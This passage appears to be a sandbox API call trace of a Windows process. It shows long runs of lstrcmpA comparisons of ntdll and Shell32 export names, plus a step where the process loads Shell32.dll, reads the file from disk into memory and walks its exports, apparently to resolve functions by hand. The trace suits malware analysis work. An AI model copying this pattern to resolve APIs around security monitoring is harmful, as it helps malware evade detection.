[0270.469] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0270.469] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0270.469] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0270.469] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0270.469] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0270.469] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0270.469] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0270.469] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0270.469] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0270.469] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0270.470] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0270.470] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0270.470] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0270.470] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0270.470] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0270.470] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0270.470] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0270.470] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0270.470] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0270.568] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0270.568] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0270.568] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0270.568] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0270.568] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0270.568] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0270.569] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0270.569] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0270.569] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0270.569] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0270.569] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0270.569] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0270.569] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0270.569] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0270.569] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0270.569] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0270.569] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0270.569] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0270.569] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0273.167] GetProcessHeap () returned 0x470000 [0273.167] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40ca040 | out: hHeap=0x470000) returned 1 [0273.177] GetProcessHeap () returned 0x470000 [0273.177] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4890e0 [0273.177] LoadLibraryA (lpLibFileName="Shell32.dll") returned 0x7ffc5cc80000 [0273.177] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0273.178] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0273.178] GetModuleFileNameA (in: hModule=0x7ffc5cc80000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0273.179] CreateFileA (lpFileName="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0273.179] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0273.179] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0273.179] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=22573656) returned 1 [0273.179] GetProcessHeap () returned 0x470000 [0273.179] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1587258) returned 0x40c6040 [0273.544] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0273.544] ReadFile (in: hFile=0x140, lpBuffer=0x40c6040, nNumberOfBytesToRead=0x1587258, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40c6040*, lpNumberOfBytesRead=0x14f5a4*=0x1587258, lpOverlapped=0x0) returned 1 [0276.858] CloseHandle (hObject=0x140) returned 1 [0276.859] lstrcmpA (lpString1="AppCompat_RunDLLW", lpString2="AppCompat_RunDLLW") returned 0 [0276.859] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AppCompat_RunDLLW") returned 1 [0276.859] lstrcmpA (lpString1="AssocCreateForClasses", lpString2="AssocCreateForClasses") returned 0 [0276.859] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AppCompat_RunDLLW") returned 1 [0276.859] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocCreateForClasses") returned 1 [0276.859] lstrcmpA (lpString1="AssocGetDetailsOfPropKey", lpString2="AssocGetDetailsOfPropKey") returned 0 [0276.859] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AppCompat_RunDLLW") returned 1 [0276.859] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocCreateForClasses") returned 1 [0276.859] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.859] lstrcmpA (lpString1="CDefFolderMenu_Create2", lpString2="CDefFolderMenu_Create2") returned 0 [0276.859] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AppCompat_RunDLLW") returned 1 [0276.859] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocCreateForClasses") returned 1 [0276.859] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.859] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CDefFolderMenu_Create2") returned 1 [0276.859] lstrcmpA (lpString1="CIDLData_CreateFromIDArray", lpString2="CIDLData_CreateFromIDArray") returned 0 [0276.860] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AppCompat_RunDLLW") returned 1 [0276.860] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocCreateForClasses") returned 1 [0276.860] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.860] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CDefFolderMenu_Create2") returned 1 [0276.860] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CIDLData_CreateFromIDArray") returned 1 [0276.860] lstrcmpA (lpString1="CStorageItem_GetValidatedStorageItemObject", lpString2="CStorageItem_GetValidatedStorageItemObject") returned 0 [0276.860] lstrcmpA (lpString1="CheckEscapesW", lpString2="AppCompat_RunDLLW") returned 1 [0276.860] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocCreateForClasses") returned 1 [0276.860] lstrcmpA (lpString1="CheckEscapesW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.860] lstrcmpA (lpString1="CheckEscapesW", lpString2="CDefFolderMenu_Create2") returned 1 [0276.860] lstrcmpA (lpString1="CheckEscapesW", lpString2="CIDLData_CreateFromIDArray") returned -1 [0276.860] lstrcmpA (lpString1="CheckEscapesW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0276.860] lstrcmpA (lpString1="CheckEscapesW", lpString2="CheckEscapesW") returned 0 [0276.860] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AppCompat_RunDLLW") returned 1 [0276.860] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocCreateForClasses") returned 1 [0276.860] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.860] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CDefFolderMenu_Create2") returned 1 [0276.860] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0276.860] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0276.861] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CheckEscapesW") returned 1 [0276.861] lstrcmpA (lpString1="CommandLineToArgvW", lpString2="CommandLineToArgvW") returned 0 [0276.861] lstrcmpA (lpString1="Control_RunDLL", lpString2="AppCompat_RunDLLW") returned 1 [0276.861] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocCreateForClasses") returned 1 [0276.861] lstrcmpA (lpString1="Control_RunDLL", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.861] lstrcmpA (lpString1="Control_RunDLL", lpString2="CDefFolderMenu_Create2") returned 1 [0276.861] lstrcmpA (lpString1="Control_RunDLL", lpString2="CIDLData_CreateFromIDArray") returned 1 [0276.861] lstrcmpA (lpString1="Control_RunDLL", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0276.861] lstrcmpA (lpString1="Control_RunDLL", lpString2="CheckEscapesW") returned 1 [0276.861] lstrcmpA (lpString1="Control_RunDLL", lpString2="CommandLineToArgvW") returned 1 [0276.861] lstrcmpA (lpString1="Control_RunDLL", lpString2="Control_RunDLL") returned 0 [0276.861] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AppCompat_RunDLLW") returned 1 [0276.861] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocCreateForClasses") returned 1 [0276.861] lstrcmpA (lpString1="Control_RunDLLA", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.861] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CDefFolderMenu_Create2") returned 1 [0276.861] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CIDLData_CreateFromIDArray") returned 1 [0276.861] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0276.861] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CheckEscapesW") returned 1 [0276.861] lstrcmpA (lpString1="Control_RunDLLA", lpString2="CommandLineToArgvW") returned 1 [0276.861] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLL") returned 1 [0276.861] lstrcmpA (lpString1="Control_RunDLLA", lpString2="Control_RunDLLA") returned 0 [0276.862] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AppCompat_RunDLLW") returned 1 [0276.862] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocCreateForClasses") returned 1 [0276.862] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.862] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CDefFolderMenu_Create2") returned 1 [0276.862] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0276.862] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0276.862] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CheckEscapesW") returned 1 [0276.862] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="CommandLineToArgvW") returned 1 [0276.862] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLL") returned 1 [0276.862] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLA") returned 1 [0276.862] lstrcmpA (lpString1="Control_RunDLLAsUserW", lpString2="Control_RunDLLAsUserW") returned 0 [0276.862] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AppCompat_RunDLLW") returned 1 [0276.862] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocCreateForClasses") returned 1 [0276.862] lstrcmpA (lpString1="Control_RunDLLW", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.862] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CDefFolderMenu_Create2") returned 1 [0276.862] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CIDLData_CreateFromIDArray") returned 1 [0276.862] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0276.862] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CheckEscapesW") returned 1 [0276.862] lstrcmpA (lpString1="Control_RunDLLW", lpString2="CommandLineToArgvW") returned 1 [0276.863] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLL") returned 1 [0276.863] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLA") returned 1 [0276.863] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLAsUserW") returned 1 [0276.863] lstrcmpA (lpString1="Control_RunDLLW", lpString2="Control_RunDLLW") returned 0 [0276.863] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0276.863] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0276.863] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.863] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0276.863] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0276.863] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0276.863] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0276.863] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0276.863] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0276.863] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0276.863] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0276.863] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0276.863] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 0 [0276.863] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0276.863] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0276.863] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.863] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0276.863] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 0 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CheckEscapesW") returned 1 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLL") returned 1 [0276.864] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLA") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="Control_RunDLLW") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromPath_PartialTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 0 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AppCompat_RunDLLW") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocCreateForClasses") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CDefFolderMenu_Create2") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CIDLData_CreateFromIDArray") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CheckEscapesW") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CommandLineToArgvW") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLL") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLA") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLAsUserW") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="Control_RunDLLW") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 0 [0276.865] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AppCompat_RunDLLW") returned 1 [0276.866] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocCreateForClasses") returned 1 [0276.866] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.866] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0276.866] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0276.866] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0276.866] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CheckEscapesW") returned 1 [0276.866] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CommandLineToArgvW") returned 1 [0276.866] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLL") returned 1 [0276.866] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLA") returned 1 [0276.866] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLAsUserW") returned 1 [0276.866] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="Control_RunDLLW") returned 1 [0276.866] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0276.866] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0276.866] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0276.866] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0276.866] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 0 [0276.866] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AppCompat_RunDLLW") returned 1 [0276.866] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocCreateForClasses") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CDefFolderMenu_Create2") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CIDLData_CreateFromIDArray") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CheckEscapesW") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CommandLineToArgvW") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLL") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLA") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLAsUserW") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="Control_RunDLLW") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_FullTrustCaller_ForPackage") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromPath_PartialTrustCaller") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle", lpString2="CreateStorageItemFromShellItem_FullTrustCaller_ForPackage_WithProcessHandle") returned 0 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AppCompat_RunDLLW") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocCreateForClasses") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="AssocGetDetailsOfPropKey") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CDefFolderMenu_Create2") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CIDLData_CreateFromIDArray") returned 1 [0276.867] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", lpString2="CStorageItem_GetValidatedStorageItemObject") returned -1 [0276.868] lstrcmpA (lpString1="CreateStorageItemFromShellItem_FullTrustCaller_UseImplicitFlagsAndPackage", 